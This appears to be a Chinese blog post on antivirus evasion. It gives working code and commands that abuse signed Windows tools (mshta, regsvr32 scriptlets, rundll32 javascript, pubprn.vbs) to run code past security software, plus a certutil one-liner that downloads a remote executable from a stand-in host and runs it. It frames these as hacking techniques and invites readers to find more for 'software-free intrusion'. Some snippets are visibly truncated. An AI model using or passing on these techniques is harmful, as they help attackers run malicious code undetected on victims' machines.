黑客里的白名单

2022-11-24 08:55:47 交互设计 ℃

　　先来讲解一下什么是白名单。以前黑客制造出木马病毒来，时间一长，制作的木马病毒就会被杀软公司捕获，生命周期就很短了。后来黑客们想了一个办法，让木马打上或伪造正规公司的软件签名，让杀毒软件对其放行，这个方法在十年前是风靡一时的过卡巴斯基的好办法。因为卡巴斯基或其它杀软里都有一个白名单机制，会对白名单里的软件放行，特别是卡巴斯基默认放行有签名的软件。再后来，这个办法也被杀软公司识破了，黑客们又想出一个办法，让正规、已经有微软或其他大公司签名的软件来加载自己写的恶意DLL，就是所谓的DLL劫持了。像是写一个DLL，放在搜狗输入法的目录底下，你运行搜狗输入法，就会调用黑客写的DLL。这样的办法，只能是靠各大公司检查自己的软件，有没有DLL劫持漏洞了，再是杀软会检查DLL里有没有恶意代码。再再后来，黑客们不写软件了，完全调用微软自身的软件来执行自己的代码，就是我这篇文章要讲的了。这里给大家讲三种利用微软自身的软件来执行命令，会绕过杀软，进入白名单机制。

　　一、用mshta来执行命令

　　1、先来写一段代码：

　　<HTML>

　　<HEAD>

　　Window.ReSizeTo 0, 0

　　Window.moveTo -2000,-2000

　　Set objShell = CreateObject("Wscript.Shell")

　　objShell.Run "calc.exe"

　　self.close

　　</script>

　　<body>

　　demo

　　</body>

　　</HEAD>

　　</HTML>

　　2、你把我的代码放在D 盘也好，放在网上也行。然后执行：mshta d:\hta.hta 或mshta http:\\site.com\hta.hta，这个hta.hta是可以随便改名的，计算器就会弹出来，至于如何躲过杀软，要看你的代码水平了。

　　二、用regsvr32.exe来执行恶意代码

　　1、先来写一段代码，假设名叫calc.sct

　　<?XML version="1.0"?>

　　<registration

　　 description="Empire"

　　 progid="Empire"

　　 version="1.00"

　　 classid="{20001111-0000-0000-0000-0000FEEDACDC}"

　　<![CDATA[

　　set ws = CreateObject("WScript.Shell")

　　ws.exec("calc.exe")

　　]]>

　　</script>

　　</registration>

　　</public>

　　</scriptlet>

　　2、执行 ,你可以把calc.sct放本地也可以，放网上也行，上边的代码里我都写了如何运行了，calc.sct也可以随便改名。我们执行：

　　regsvr32 /s /n /u /i:d:/calc.sct scrobj.dll

　　三、用rundll32.exe来执行

　　1、我们写一段代码c.txt

　　<?XML version="1.0"?>

　　<![CDATA[

　　var r = new ActiveXObject("WScript.Shell").Run("calc.exe");

　　]]>

　　</script>

　　</scriptlet>

　　2、执行，注意c.txt也可以随便改名

　　rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:d:/c.txt");this.close()

　　计算器也会弹出来。

　　以上我只举了三个例子，其实还有很多这样的办法，不抓图再举两例吧：

　　cscript /b C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:d:/c.txt

　　certutil -urlcache -split -f http://site.com/a a.exe && a.exe

　　这样的方法不止这五种，还有更多，如果你有兴趣学黑客的话，自己挖掘一下吧，完全是无软件入侵。

标签：交互设计

上一篇：Samba介绍

下一篇：返回列表

黑客里的白名单

相关推荐

Samba介绍

不是瞧不起你，VR小电影你还真不一定

免费、小巧、易用，制作GIF动图必备

NB-IoT和LoRa的区别